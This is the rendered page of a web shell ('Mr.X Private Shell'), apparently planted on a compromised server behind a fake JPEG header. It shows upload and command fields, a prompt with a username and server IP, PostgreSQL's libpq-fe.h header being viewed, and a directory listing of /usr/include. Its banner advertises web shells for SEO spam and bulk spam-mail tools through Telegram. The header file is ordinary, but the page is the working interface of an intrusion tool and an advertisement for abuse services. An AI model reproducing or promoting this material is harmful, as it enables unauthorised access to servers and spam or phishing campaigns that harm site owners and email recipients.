����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

pegaorg@216.73.216.111: ~ $
/*-------------------------------------------------------------------------
 *
 * libpq-fe.h
 *	  This file contains definitions for structures and
 *	  externs for functions used by frontend postgres applications.
 *
 * Portions Copyright (c) 1996-2012, PostgreSQL Global Development Group
 * Portions Copyright (c) 1994, Regents of the University of California
 *
 * src/interfaces/libpq/libpq-fe.h
 *
 *-------------------------------------------------------------------------
 */

#ifndef LIBPQ_FE_H
#define LIBPQ_FE_H

#ifdef __cplusplus
extern		"C"
{
#endif

#include <stdio.h>

/*
 * postgres_ext.h defines the backend's externally visible types,
 * such as Oid.
 */
#include "postgres_ext.h"

/*
 * Option flags for PQcopyResult
 */
#define PG_COPYRES_ATTRS		  0x01
#define PG_COPYRES_TUPLES		  0x02	/* Implies PG_COPYRES_ATTRS */
#define PG_COPYRES_EVENTS		  0x04
#define PG_COPYRES_NOTICEHOOKS	  0x08

/* Application-visible enum types */

/*
 * Although it is okay to add to these lists, values which become unused
 * should never be removed, nor should constants be redefined - that would
 * break compatibility with existing code.
 */

typedef enum
{
	CONNECTION_OK,
	CONNECTION_BAD,
	/* Non-blocking mode only below here */

	/*
	 * The existence of these should never be relied upon - they should only
	 * be used for user feedback or similar purposes.
	 */
	CONNECTION_STARTED,			/* Waiting for connection to be made.  */
	CONNECTION_MADE,			/* Connection OK; waiting to send.     */
	CONNECTION_AWAITING_RESPONSE,		/* Waiting for a response from the
										 * postmaster.        */
	CONNECTION_AUTH_OK,			/* Received authentication; waiting for
								 * backend startup. */
	CONNECTION_SETENV,			/* Negotiating environment. */
	CONNECTION_SSL_STARTUP,		/* Negotiating SSL. */
	CONNECTION_NEEDED			/* Internal state: connect() needed */
} ConnStatusType;

typedef enum
{
	PGRES_POLLING_FAILED = 0,
	PGRES_POLLING_READING,		/* These two indicate that one may	  */
	PGRES_POLLING_WRITING,		/* use select before polling again.   */
	PGRES_POLLING_OK,
	PGRES_POLLING_ACTIVE		/* unused; keep for awhile for backwards
								 * compatibility */
} PostgresPollingStatusType;

typedef enum
{
	PGRES_EMPTY_QUERY = 0,		/* empty query string was executed */
	PGRES_COMMAND_OK,			/* a query command that doesn't return
								 * anything was executed properly by the
								 * backend */
	PGRES_TUPLES_OK,			/* a query command that returns tuples was
								 * executed properly by the backend, PGresult
								 * contains the result tuples */
	PGRES_COPY_OUT,				/* Copy Out data transfer in progress */
	PGRES_COPY_IN,				/* Copy In data transfer in progress */
	PGRES_BAD_RESPONSE,			/* an unexpected response was recv'd from the
								 * backend */
	PGRES_NONFATAL_ERROR,		/* notice or warning message */
	PGRES_FATAL_ERROR,			/* query failed */
	PGRES_COPY_BOTH,			/* Copy In/Out data transfer in progress */
	PGRES_SINGLE_TUPLE			/* single tuple from larger resultset */
} ExecStatusType;

typedef enum
{
	PQTRANS_IDLE,				/* connection idle */
	PQTRANS_ACTIVE,				/* command in progress */
	PQTRANS_INTRANS,			/* idle, within transaction block */
	PQTRANS_INERROR,			/* idle, within failed transaction */
	PQTRANS_UNKNOWN				/* cannot determine status */
} PGTransactionStatusType;

typedef enum
{
	PQERRORS_TERSE,				/* single-line error messages */
	PQERRORS_DEFAULT,			/* recommended style */
	PQERRORS_VERBOSE			/* all the facts, ma'am */
} PGVerbosity;

typedef enum
{
	PQPING_OK,					/* server is accepting connections */
	PQPING_REJECT,				/* server is alive but rejecting connections */
	PQPING_NO_RESPONSE,			/* could not establish connection */
	PQPING_NO_ATTEMPT			/* connection not attempted (bad params) */
} PGPing;

/* PGconn encapsulates a connection to the backend.
 * The contents of this struct are not supposed to be known to applications.
 */
typedef struct pg_conn PGconn;

/* PGresult encapsulates the result of a query (or more precisely, of a single
 * SQL command --- a query string given to PQsendQuery can contain multiple
 * commands and thus return multiple PGresult objects).
 * The contents of this struct are not supposed to be known to applications.
 */
typedef struct pg_result PGresult;

/* PGcancel encapsulates the information needed to cancel a running
 * query on an existing connection.
 * The contents of this struct are not supposed to be known to applications.
 */
typedef struct pg_cancel PGcancel;

/* PGnotify represents the occurrence of a NOTIFY message.
 * Ideally this would be an opaque typedef, but it's so simple that it's
 * unlikely to change.
 * NOTE: in Postgres 6.4 and later, the be_pid is the notifying backend's,
 * whereas in earlier versions it was always your own backend's PID.
 */
typedef struct pgNotify
{
	char	   *relname;		/* notification condition name */
	int			be_pid;			/* process ID of notifying server process */
	char	   *extra;			/* notification parameter */
	/* Fields below here are private to libpq; apps should not use 'em */
	struct pgNotify *next;		/* list link */
} PGnotify;

/* Function types for notice-handling callbacks */
typedef void (*PQnoticeReceiver) (void *arg, const PGresult *res);
typedef void (*PQnoticeProcessor) (void *arg, const char *message);

/* Print options for PQprint() */
typedef char pqbool;

typedef struct _PQprintOpt
{
	pqbool		header;			/* print output field headings and row count */
	pqbool		align;			/* fill align the fields */
	pqbool		standard;		/* old brain dead format */
	pqbool		html3;			/* output html tables */
	pqbool		expanded;		/* expand tables */
	pqbool		pager;			/* use pager for output if needed */
	char	   *fieldSep;		/* field separator */
	char	   *tableOpt;		/* insert to HTML <table ...> */
	char	   *caption;		/* HTML <caption> */
	char	  **fieldName;		/* null terminated array of replacement field
								 * names */
} PQprintOpt;

/* ----------------
 * Structure for the conninfo parameter definitions returned by PQconndefaults
 * or PQconninfoParse.
 *
 * All fields except "val" point at static strings which must not be altered.
 * "val" is either NULL or a malloc'd current-value string.  PQconninfoFree()
 * will release both the val strings and the PQconninfoOption array itself.
 * ----------------
 */
typedef struct _PQconninfoOption
{
	char	   *keyword;		/* The keyword of the option			*/
	char	   *envvar;			/* Fallback environment variable name	*/
	char	   *compiled;		/* Fallback compiled in default value	*/
	char	   *val;			/* Option's current value, or NULL		 */
	char	   *label;			/* Label for field in connect dialog	*/
	char	   *dispchar;		/* Indicates how to display this field in a
								 * connect dialog. Values are: "" Display
								 * entered value as is "*" Password field -
								 * hide value "D"  Debug option - don't show
								 * by default */
	int			dispsize;		/* Field size in characters for dialog	*/
} PQconninfoOption;

/* ----------------
 * PQArgBlock -- structure for PQfn() arguments
 * ----------------
 */
typedef struct
{
	int			len;
	int			isint;
	union
	{
		int		   *ptr;		/* can't use void (dec compiler barfs)	 */
		int			integer;
	}			u;
} PQArgBlock;

/* ----------------
 * PGresAttDesc -- Data about a single attribute (column) of a query result
 * ----------------
 */
typedef struct pgresAttDesc
{
	char	   *name;			/* column name */
	Oid			tableid;		/* source table, if known */
	int			columnid;		/* source column, if known */
	int			format;			/* format code for value (text/binary) */
	Oid			typid;			/* type id */
	int			typlen;			/* type size */
	int			atttypmod;		/* type-specific modifier info */
} PGresAttDesc;

/* ----------------
 * Exported functions of libpq
 * ----------------
 */

/* ===	in fe-connect.c === */

/* make a new client connection to the backend */
/* Asynchronous (non-blocking) */
extern PGconn *PQconnectStart(const char *conninfo);
extern PGconn *PQconnectStartParams(const char *const * keywords,
					 const char *const * values, int expand_dbname);
extern PostgresPollingStatusType PQconnectPoll(PGconn *conn);

/* Synchronous (blocking) */
extern PGconn *PQconnectdb(const char *conninfo);
extern PGconn *PQconnectdbParams(const char *const * keywords,
				  const char *const * values, int expand_dbname);
extern PGconn *PQsetdbLogin(const char *pghost, const char *pgport,
			 const char *pgoptions, const char *pgtty,
			 const char *dbName,
			 const char *login, const char *pwd);

#define PQsetdb(M_PGHOST,M_PGPORT,M_PGOPT,M_PGTTY,M_DBNAME)  \
	PQsetdbLogin(M_PGHOST, M_PGPORT, M_PGOPT, M_PGTTY, M_DBNAME, NULL, NULL)

/* close the current connection and free the PGconn data structure */
extern void PQfinish(PGconn *conn);

/* get info about connection options known to PQconnectdb */
extern PQconninfoOption *PQconndefaults(void);

/* parse connection options in same way as PQconnectdb */
extern PQconninfoOption *PQconninfoParse(const char *conninfo, char **errmsg);

/* free the data structure returned by PQconndefaults() or PQconninfoParse() */
extern void PQconninfoFree(PQconninfoOption *connOptions);

/*
 * close the current connection and restablish a new one with the same
 * parameters
 */
/* Asynchronous (non-blocking) */
extern int	PQresetStart(PGconn *conn);
extern PostgresPollingStatusType PQresetPoll(PGconn *conn);

/* Synchronous (blocking) */
extern void PQreset(PGconn *conn);

/* request a cancel structure */
extern PGcancel *PQgetCancel(PGconn *conn);

/* free a cancel structure */
extern void PQfreeCancel(PGcancel *cancel);

/* issue a cancel request */
extern int	PQcancel(PGcancel *cancel, char *errbuf, int errbufsize);

/* backwards compatible version of PQcancel; not thread-safe */
extern int	PQrequestCancel(PGconn *conn);

/* Accessor functions for PGconn objects */
extern char *PQdb(const PGconn *conn);
extern char *PQuser(const PGconn *conn);
extern char *PQpass(const PGconn *conn);
extern char *PQhost(const PGconn *conn);
extern char *PQport(const PGconn *conn);
extern char *PQtty(const PGconn *conn);
extern char *PQoptions(const PGconn *conn);
extern ConnStatusType PQstatus(const PGconn *conn);
extern PGTransactionStatusType PQtransactionStatus(const PGconn *conn);
extern const char *PQparameterStatus(const PGconn *conn,
				  const char *paramName);
extern int	PQprotocolVersion(const PGconn *conn);
extern int	PQserverVersion(const PGconn *conn);
extern char *PQerrorMessage(const PGconn *conn);
extern int	PQsocket(const PGconn *conn);
extern int	PQbackendPID(const PGconn *conn);
extern int	PQconnectionNeedsPassword(const PGconn *conn);
extern int	PQconnectionUsedPassword(const PGconn *conn);
extern int	PQclientEncoding(const PGconn *conn);
extern int	PQsetClientEncoding(PGconn *conn, const char *encoding);

/* Get the OpenSSL structure associated with a connection. Returns NULL for
 * unencrypted connections or if any other TLS library is in use. */
extern void *PQgetssl(PGconn *conn);

/* Tell libpq whether it needs to initialize OpenSSL */
extern void PQinitSSL(int do_init);

/* More detailed way to tell libpq whether it needs to initialize OpenSSL */
extern void PQinitOpenSSL(int do_ssl, int do_crypto);

/* Set verbosity for PQerrorMessage and PQresultErrorMessage */
extern PGVerbosity PQsetErrorVerbosity(PGconn *conn, PGVerbosity verbosity);

/* Enable/disable tracing */
extern void PQtrace(PGconn *conn, FILE *debug_port);
extern void PQuntrace(PGconn *conn);

/* Override default notice handling routines */
extern PQnoticeReceiver PQsetNoticeReceiver(PGconn *conn,
					PQnoticeReceiver proc,
					void *arg);
extern PQnoticeProcessor PQsetNoticeProcessor(PGconn *conn,
					 PQnoticeProcessor proc,
					 void *arg);

/*
 *	   Used to set callback that prevents concurrent access to
 *	   non-thread safe functions that libpq needs.
 *	   The default implementation uses a libpq internal mutex.
 *	   Only required for multithreaded apps that use kerberos
 *	   both within their app and for postgresql connections.
 */
typedef void (*pgthreadlock_t) (int acquire);

extern pgthreadlock_t PQregisterThreadLock(pgthreadlock_t newhandler);

/* === in fe-exec.c === */

/* Simple synchronous query */
extern PGresult *PQexec(PGconn *conn, const char *query);
extern PGresult *PQexecParams(PGconn *conn,
			 const char *command,
			 int nParams,
			 const Oid *paramTypes,
			 const char *const * paramValues,
			 const int *paramLengths,
			 const int *paramFormats,
			 int resultFormat);
extern PGresult *PQprepare(PGconn *conn, const char *stmtName,
		  const char *query, int nParams,
		  const Oid *paramTypes);
extern PGresult *PQexecPrepared(PGconn *conn,
			   const char *stmtName,
			   int nParams,
			   const char *const * paramValues,
			   const int *paramLengths,
			   const int *paramFormats,
			   int resultFormat);

/* Interface for multiple-result or asynchronous queries */
extern int	PQsendQuery(PGconn *conn, const char *query);
extern int PQsendQueryParams(PGconn *conn,
				  const char *command,
				  int nParams,
				  const Oid *paramTypes,
				  const char *const * paramValues,
				  const int *paramLengths,
				  const int *paramFormats,
				  int resultFormat);
extern int PQsendPrepare(PGconn *conn, const char *stmtName,
			  const char *query, int nParams,
			  const Oid *paramTypes);
extern int PQsendQueryPrepared(PGconn *conn,
					const char *stmtName,
					int nParams,
					const char *const * paramValues,
					const int *paramLengths,
					const int *paramFormats,
					int resultFormat);
extern int	PQsetSingleRowMode(PGconn *conn);
extern PGresult *PQgetResult(PGconn *conn);

/* Routines for managing an asynchronous query */
extern int	PQisBusy(PGconn *conn);
extern int	PQconsumeInput(PGconn *conn);

/* LISTEN/NOTIFY support */
extern PGnotify *PQnotifies(PGconn *conn);

/* Routines for copy in/out */
extern int	PQputCopyData(PGconn *conn, const char *buffer, int nbytes);
extern int	PQputCopyEnd(PGconn *conn, const char *errormsg);
extern int	PQgetCopyData(PGconn *conn, char **buffer, int async);

/* Deprecated routines for copy in/out */
extern int	PQgetline(PGconn *conn, char *string, int length);
extern int	PQputline(PGconn *conn, const char *string);
extern int	PQgetlineAsync(PGconn *conn, char *buffer, int bufsize);
extern int	PQputnbytes(PGconn *conn, const char *buffer, int nbytes);
extern int	PQendcopy(PGconn *conn);

/* Set blocking/nonblocking connection to the backend */
extern int	PQsetnonblocking(PGconn *conn, int arg);
extern int	PQisnonblocking(const PGconn *conn);
extern int	PQisthreadsafe(void);
extern PGPing PQping(const char *conninfo);
extern PGPing PQpingParams(const char *const * keywords,
			 const char *const * values, int expand_dbname);

/* Force the write buffer to be written (or at least try) */
extern int	PQflush(PGconn *conn);

/*
 * "Fast path" interface --- not really recommended for application
 * use
 */
extern PGresult *PQfn(PGconn *conn,
	 int fnid,
	 int *result_buf,
	 int *result_len,
	 int result_is_int,
	 const PQArgBlock *args,
	 int nargs);

/* Accessor functions for PGresult objects */
extern ExecStatusType PQresultStatus(const PGresult *res);
extern char *PQresStatus(ExecStatusType status);
extern char *PQresultErrorMessage(const PGresult *res);
extern char *PQresultErrorField(const PGresult *res, int fieldcode);
extern int	PQntuples(const PGresult *res);
extern int	PQnfields(const PGresult *res);
extern int	PQbinaryTuples(const PGresult *res);
extern char *PQfname(const PGresult *res, int field_num);
extern int	PQfnumber(const PGresult *res, const char *field_name);
extern Oid	PQftable(const PGresult *res, int field_num);
extern int	PQftablecol(const PGresult *res, int field_num);
extern int	PQfformat(const PGresult *res, int field_num);
extern Oid	PQftype(const PGresult *res, int field_num);
extern int	PQfsize(const PGresult *res, int field_num);
extern int	PQfmod(const PGresult *res, int field_num);
extern char *PQcmdStatus(PGresult *res);
extern char *PQoidStatus(const PGresult *res);	/* old and ugly */
extern Oid	PQoidValue(const PGresult *res);	/* new and improved */
extern char *PQcmdTuples(PGresult *res);
extern char *PQgetvalue(const PGresult *res, int tup_num, int field_num);
extern int	PQgetlength(const PGresult *res, int tup_num, int field_num);
extern int	PQgetisnull(const PGresult *res, int tup_num, int field_num);
extern int	PQnparams(const PGresult *res);
extern Oid	PQparamtype(const PGresult *res, int param_num);

/* Describe prepared statements and portals */
extern PGresult *PQdescribePrepared(PGconn *conn, const char *stmt);
extern PGresult *PQdescribePortal(PGconn *conn, const char *portal);
extern int	PQsendDescribePrepared(PGconn *conn, const char *stmt);
extern int	PQsendDescribePortal(PGconn *conn, const char *portal);

/* Delete a PGresult */
extern void PQclear(PGresult *res);

/* For freeing other alloc'd results, such as PGnotify structs */
extern void PQfreemem(void *ptr);

/* Exists for backward compatibility.  bjm 2003-03-24 */
#define PQfreeNotify(ptr) PQfreemem(ptr)

/* Error when no password was given. */
/* Note: depending on this is deprecated; use PQconnectionNeedsPassword(). */
#define PQnoPasswordSupplied	"fe_sendauth: no password supplied\n"

/* Create and manipulate PGresults */
extern PGresult *PQmakeEmptyPGresult(PGconn *conn, ExecStatusType status);
extern PGresult *PQcopyResult(const PGresult *src, int flags);
extern int	PQsetResultAttrs(PGresult *res, int numAttributes, PGresAttDesc *attDescs);
extern void *PQresultAlloc(PGresult *res, size_t nBytes);
extern int	PQsetvalue(PGresult *res, int tup_num, int field_num, char *value, int len);

/* Quoting strings before inclusion in queries. */
extern size_t PQescapeStringConn(PGconn *conn,
				   char *to, const char *from, size_t length,
				   int *error);
extern char *PQescapeLiteral(PGconn *conn, const char *str, size_t len);
extern char *PQescapeIdentifier(PGconn *conn, const char *str, size_t len);
extern unsigned char *PQescapeByteaConn(PGconn *conn,
				  const unsigned char *from, size_t from_length,
				  size_t *to_length);
extern unsigned char *PQunescapeBytea(const unsigned char *strtext,
				size_t *retbuflen);

/* These forms are deprecated! */
extern size_t PQescapeString(char *to, const char *from, size_t length);
extern unsigned char *PQescapeBytea(const unsigned char *from, size_t from_length,
			  size_t *to_length);



/* === in fe-print.c === */

extern void
PQprint(FILE *fout,				/* output stream */
		const PGresult *res,
		const PQprintOpt *ps);	/* option structure */

/*
 * really old printing routines
 */
extern void
PQdisplayTuples(const PGresult *res,
				FILE *fp,		/* where to send the output */
				int fillAlign,	/* pad the fields with spaces */
				const char *fieldSep,	/* field separator */
				int printHeader,	/* display headers? */
				int quiet);

extern void
PQprintTuples(const PGresult *res,
			  FILE *fout,		/* output stream */
			  int printAttName, /* print attribute names */
			  int terseOutput,	/* delimiter bars */
			  int width);		/* width of column, if 0, use variable width */


/* === in fe-lobj.c === */

/* Large-object access routines */
extern int	lo_open(PGconn *conn, Oid lobjId, int mode);
extern int	lo_close(PGconn *conn, int fd);
extern int	lo_read(PGconn *conn, int fd, char *buf, size_t len);
extern int	lo_write(PGconn *conn, int fd, const char *buf, size_t len);
extern int	lo_lseek(PGconn *conn, int fd, int offset, int whence);
extern Oid	lo_creat(PGconn *conn, int mode);
extern Oid	lo_create(PGconn *conn, Oid lobjId);
extern int	lo_tell(PGconn *conn, int fd);
extern int	lo_truncate(PGconn *conn, int fd, size_t len);
extern int	lo_unlink(PGconn *conn, Oid lobjId);
extern Oid	lo_import(PGconn *conn, const char *filename);
extern Oid	lo_import_with_oid(PGconn *conn, const char *filename, Oid lobjId);
extern int	lo_export(PGconn *conn, Oid lobjId, const char *filename);

/* === in fe-misc.c === */

/* Get the version of the libpq library in use */
extern int	PQlibVersion(void);

/* Determine length of multibyte encoded char at *s */
extern int	PQmblen(const char *s, int encoding);

/* Determine display length of multibyte encoded char at *s */
extern int	PQdsplen(const char *s, int encoding);

/* Get encoding id from environment variable PGCLIENTENCODING */
extern int	PQenv2encoding(void);

/* === in fe-auth.c === */

extern char *PQencryptPassword(const char *passwd, const char *user);

/* === in encnames.c === */

extern int	pg_char_to_encoding(const char *name);
extern const char *pg_encoding_to_char(int encoding);
extern int	pg_valid_server_encoding_id(int encoding);

#ifdef __cplusplus
}
#endif

#endif   /* LIBPQ_FE_H */

Filemanager

Name Type Size Permission Actions
GL Folder 0755
ImageMagick-6 Folder 0755
X11 Folder 0755
apache2 Folder 0755
arpa Folder 0755
asm Folder 0755
asm-generic Folder 0755
bind9 Folder 0755
bits Folder 0755
bsock Folder 0755
c++ Folder 0755
criu Folder 0755
curl Folder 0755
db4.7.25 Folder 0755
drm Folder 0755
e2p Folder 0755
et Folder 0755
ext2fs Folder 0755
fontconfig Folder 0755
freetype2 Folder 0755
gdbm Folder 0755
ghostscript Folder 0755
gnu Folder 0755
gssapi Folder 0755
gssrpc Folder 0755
ijs Folder 0755
jasper Folder 0755
kadm5 Folder 0755
krb5 Folder 0755
libdb Folder 0755
libexslt Folder 0755
libltdl Folder 0755
libpng15 Folder 0755
libpq Folder 0755
libxml2 Folder 0755
libxslt Folder 0755
linux Folder 0755
lve Folder 0755
lzma Folder 0755
misc Folder 0755
mtd Folder 0755
mysql Folder 0755
ncurses Folder 0755
ncursesw Folder 0755
net Folder 0755
netash Folder 0755
netatalk Folder 0755
netax25 Folder 0755
neteconet Folder 0755
netinet Folder 0755
netipx Folder 0755
netiucv Folder 0755
netpacket Folder 0755
netrom Folder 0755
netrose Folder 0755
nfs Folder 0755
openssl Folder 0755
pgsql Folder 0755
protocols Folder 0755
python2.7 Folder 0755
python3.6m Folder 0755
quota Folder 0755
rdma Folder 0755
rpc Folder 0755
rpcsvc Folder 0755
sasl Folder 0755
scsi Folder 0755
security Folder 0755
selinux Folder 0755
sepol Folder 0755
sodium Folder 0755
sound Folder 0755
sys Folder 0755
uapi Folder 0755
uuid Folder 0755
video Folder 0755
xcb Folder 0755
xen Folder 0755
FlexLexer.h File 6.07 KB 0644
_G_config.h File 1.26 KB 0644
a.out.h File 4.25 KB 0644
aio.h File 7.27 KB 0644
aliases.h File 2 KB 0644
alloca.h File 1.19 KB 0644
ar.h File 1.68 KB 0644
argp.h File 24.75 KB 0644
argz.h File 6.96 KB 0644
assert.h File 3.52 KB 0644
autosprintf.h File 2.33 KB 0644
byteswap.h File 1.41 KB 0644
bzlib.h File 6.1 KB 0644
com_err.h File 2.07 KB 0644
complex.h File 3.62 KB 0644
cpio.h File 2.21 KB 0644
cpufreq.h File 5.8 KB 0644
crypt.h File 2.22 KB 0644
ctype.h File 11.52 KB 0644
curses.h File 93.19 KB 0644
cursesapp.h File 6.62 KB 0644
cursesf.h File 27.05 KB 0644
cursesm.h File 19.09 KB 0644
cursesp.h File 8.3 KB 0644
cursesw.h File 48.24 KB 0644
cursslk.h File 7.13 KB 0644
db.h File 120.21 KB 0444
db_185.h File 5.84 KB 0444
dbm.h File 1.37 KB 0644
dirent.h File 12.34 KB 0644
dlfcn.h File 6.88 KB 0644
ecpg_config.h File 1.02 KB 0644
ecpg_config_x86_64.h File 714 B 0644
ecpg_informix.h File 2.69 KB 0644
ecpgerrno.h File 2.48 KB 0644
ecpglib.h File 2.54 KB 0644
ecpgtype.h File 2.56 KB 0644
elf.h File 141.01 KB 0644
endian.h File 2.95 KB 0644
entities.h File 4.56 KB 0644
envz.h File 2.82 KB 0644
err.h File 2.18 KB 0644
errno.h File 2.33 KB 0644
error.h File 2.01 KB 0644
eti.h File 2.82 KB 0644
etip.h File 9.04 KB 0644
execinfo.h File 1.5 KB 0644
expat.h File 40.92 KB 0644
expat_external.h File 3.29 KB 0644
fcntl.h File 9.89 KB 0644
features.h File 12.87 KB 0644
fenv.h File 4.5 KB 0644
fmtmsg.h File 3.18 KB 0644
fnmatch.h File 2.27 KB 0644
form.h File 17.56 KB 0644
fpu_control.h File 3.5 KB 0644
fstab.h File 3.04 KB 0644
fts.h File 5.17 KB 0644
ftw.h File 5.15 KB 0644
gconv.h File 5.16 KB 0644
gcrypt-module.h File 7.18 KB 0644
gcrypt.h File 76.51 KB 0644
gd.h File 32.02 KB 0644
gd_io.h File 1.13 KB 0644
gdbm.h File 5.75 KB 0644
gdcache.h File 2.75 KB 0644
gdfontg.h File 623 B 0644
gdfontl.h File 621 B 0644
gdfontmb.h File 590 B 0644
gdfonts.h File 585 B 0644
gdfontt.h File 617 B 0644
gdfx.h File 2.34 KB 0644
getopt.h File 6.53 KB 0644
gettext-po.h File 15.17 KB 0644
glob.h File 6.51 KB 0644
gnu-versions.h File 2.29 KB 0644
gpg-error.h File 23.66 KB 0644
grp.h File 6.75 KB 0644
gshadow.h File 4.43 KB 0644
gssapi.h File 181 B 0644
iconv.h File 1.83 KB 0644
idn-free.h File 2.41 KB 0644
idn-int.h File 20 B 0644
idna.h File 3.48 KB 0644
ieee754.h File 4.81 KB 0644
ifaddrs.h File 2.77 KB 0644
inttypes.h File 11.61 KB 0644
jconfig.h File 1.7 KB 0644
jerror.h File 14.4 KB 0644
jmorecfg.h File 13.5 KB 0644
jpeglib.h File 49.12 KB 0644
kdb.h File 60.12 KB 0644
keyutils.h File 7.08 KB 0644
krad.h File 8.72 KB 0644
krb5.h File 402 B 0644
langinfo.h File 15.57 KB 0644
lastlog.h File 126 B 0644
lber.h File 14.95 KB 0644
lber_types.h File 1.43 KB 0644
ldap.h File 63.46 KB 0644
ldap_cdefs.h File 9.24 KB 0644
ldap_features.h File 1.77 KB 0644
ldap_schema.h File 9.23 KB 0644
ldap_utf8.h File 3.39 KB 0644
ldif.h File 4.58 KB 0644
libaio.h File 7.8 KB 0644
libgen.h File 1.37 KB 0644
libintl.h File 4.49 KB 0644
libio.h File 16.87 KB 0644
liblsapi-sha1.h File 569 B 0644
libpq-events.h File 2.16 KB 0644
libpq-fe.h File 20.17 KB 0644
limits.h File 4.42 KB 0644
link.h File 6.99 KB 0644
locale.h File 7.78 KB 0644
lsapidef.h File 4.85 KB 0644
lscapi.h File 25.36 KB 0644
lscapi_config.h File 599 B 0644
ltdl.h File 5.58 KB 0644
lzma.h File 9.51 KB 0644
malloc.h File 6.44 KB 0644
math.h File 15.7 KB 0644
mcheck.h File 2.4 KB 0644
memory.h File 962 B 0644
menu.h File 11.67 KB 0644
mntent.h File 3.3 KB 0644
monetary.h File 1.73 KB 0644
mqueue.h File 3.7 KB 0644
nc_tparm.h File 4.05 KB 0644
ncurses.h File 93.19 KB 0644
ncurses_dll.h File 3.83 KB 0644
ndbm.h File 2.39 KB 0644
netdb.h File 27.46 KB 0644
nl_types.h File 1.73 KB 0644
nss.h File 1.85 KB 0644
obstack.h File 18.84 KB 0644
panel.h File 3.97 KB 0644
paths.h File 2.91 KB 0644
pcre.h File 29.73 KB 0644
pcre_scanner.h File 6.45 KB 0644
pcre_stringpiece.h File 6.11 KB 0644
pcrecpp.h File 25.91 KB 0644
pcrecpparg.h File 6.62 KB 0644
pcreposix.h File 5.32 KB 0644
pg_config.h File 1.01 KB 0644
pg_config_manual.h File 9.36 KB 0644
pg_config_os.h File 1.03 KB 0644
pg_config_x86_64.h File 26.43 KB 0644
pgtypes_date.h File 766 B 0644
pgtypes_error.h File 530 B 0644
pgtypes_interval.h File 1.12 KB 0644
pgtypes_numeric.h File 2.17 KB 0644
pgtypes_timestamp.h File 1010 B 0644
png.h File 113.36 KB 0644
pngconf.h File 20.94 KB 0644
pnglibconf.h File 6.3 KB 0644
poll.h File 22 B 0644
postgres_ext.h File 1.74 KB 0644
pr29.h File 2.07 KB 0644
printf.h File 6.56 KB 0644
profile.h File 11.87 KB 0644
pthread.h File 39.95 KB 0644
pty.h File 1.51 KB 0644
punycode.h File 9.36 KB 0644
pwd.h File 5.87 KB 0644
re_comp.h File 957 B 0644
regex.h File 21.58 KB 0644
regexp.h File 6.89 KB 0644
resolv.h File 14.67 KB 0644
sched.h File 4.55 KB 0644
search.h File 5.11 KB 0644
semaphore.h File 2.36 KB 0644
setjmp.h File 3.97 KB 0644
sgtty.h File 1.33 KB 0644
shadow.h File 5.1 KB 0644
signal.h File 13.3 KB 0644
slapi-plugin.h File 37.45 KB 0644
sodium.h File 2.47 KB 0644
spawn.h File 6.53 KB 0644
sql3types.h File 834 B 0644
sqlca.h File 1.25 KB 0644
sqlda-compat.h File 1.55 KB 0644
sqlda-native.h File 820 B 0644
sqlda.h File 315 B 0644
stab.h File 264 B 0644
stdc-predef.h File 1.59 KB 0644
stdint.h File 7.94 KB 0644
stdio.h File 30.9 KB 0644
stdio_ext.h File 2.74 KB 0644
stdlib.h File 33.23 KB 0644
string.h File 21.75 KB 0644
stringprep.h File 8 KB 0644
strings.h File 4.55 KB 0644
syscall.h File 25 B 0644
sysexits.h File 5.11 KB 0644
syslog.h File 24 B 0644
tar.h File 3.67 KB 0644
tcpd.h File 11.48 KB 0644
term.h File 38.63 KB 0644
term_entry.h File 7.91 KB 0644
termcap.h File 3.4 KB 0644
termio.h File 214 B 0644
termios.h File 3.52 KB 0644
tgmath.h File 18.11 KB 0644
thread_db.h File 15.65 KB 0644
tic.h File 12.35 KB 0644
tiff.h File 34.95 KB 0644
tiffconf-64.h File 3.35 KB 0644
tiffconf.h File 250 B 0644
tiffio.h File 22.52 KB 0644
tiffio.hxx File 1.66 KB 0644
tiffvers.h File 410 B 0644
time.h File 13.4 KB 0644
tld.h File 4.54 KB 0644
ttyent.h File 2.44 KB 0644
uchar.h File 2.42 KB 0644
ucontext.h File 1.92 KB 0644
ulimit.h File 1.55 KB 0644
unctrl.h File 3.03 KB 0644
unistd.h File 41.78 KB 0644
ustat.h File 23 B 0644
utime.h File 1.5 KB 0644
utmp.h File 3.16 KB 0644
utmpx.h File 4.02 KB 0644
values.h File 1.92 KB 0644
verto-module.h File 6.48 KB 0644
verto.h File 18.57 KB 0644
wait.h File 22 B 0644
wchar.h File 31.37 KB 0644
wctype.h File 10.89 KB 0644
wordexp.h File 2.47 KB 0644
xlocale.h File 1.66 KB 0644
zconf.h File 14.92 KB 0644
zlib.h File 84.68 KB 0644